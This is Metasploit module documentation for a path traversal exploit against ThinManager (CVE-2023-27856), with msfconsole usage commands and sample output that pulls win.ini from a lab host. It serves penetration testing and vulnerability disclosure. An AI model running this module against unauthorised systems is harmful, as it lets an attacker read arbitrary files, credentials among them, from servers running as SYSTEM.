documentation/modules/auxiliary/gather/thinmanager_traversal_download.md
This module exploits a path traversal vulnerability in ThinManager <= v13.0.1 (CVE-2023-27856) to download an arbitrary file from the system.
The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
Limitation: Some files may get mangled by the application during transit.
The software can be obtained from the vendor.
Successfully tested on
msfconsole and run the following commands:msf > use auxiliary/gather/thinmanager_traversal_download
msf auxiliary(gather/thinmanager_traversal_download) > set RHOSTS <IP>
msf auxiliary(gather/thinmanager_traversal_download) > set FILE <file to download>
msf auxiliary(gather/thinmanager_traversal_download) > run
This should retrieve the file as specified through FILE from the remote server.
The file to download from the remote server.
Running the exploit against ThinManager v13.0.1 on Windows 22H2 should result in an output similar to the following:
msf auxiliary(gather/thinmanager_traversal_download) > run
[*] Running module against 192.168.137.227
[*] 192.168.137.227:2031 - Running automatic check ("set AutoCheck false" to disable)
[!] 192.168.137.227:2031 - The service is running, but could not be validated.
[*] 192.168.137.227:2031 - Sending handshake...
[*] 192.168.137.227:2031 - Received handshake response.
[*] 192.168.137.227:2031 - Requesting /Windows/win.ini from 192.168.137.227
[+] 192.168.137.227:2031 - Received response from target.
[*] 192.168.137.227:2031 - File saved as loot: /home/asdf/.msf4/loot/20250506150022_default_192.168.137.227_thinmanager.file_334213.txt
[*] Auxiliary module execution completed
msf auxiliary(gather/thinmanager_traversal_download) > cat /home/asdf/.msf4/loot/20250506150027_default_192.168.137.227_thinmanager.file_381967.txt
[*] exec: cat /home/asdf/.msf4/loot/20250506150027_default_192.168.137.227_thinmanager.file_381967.txt
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1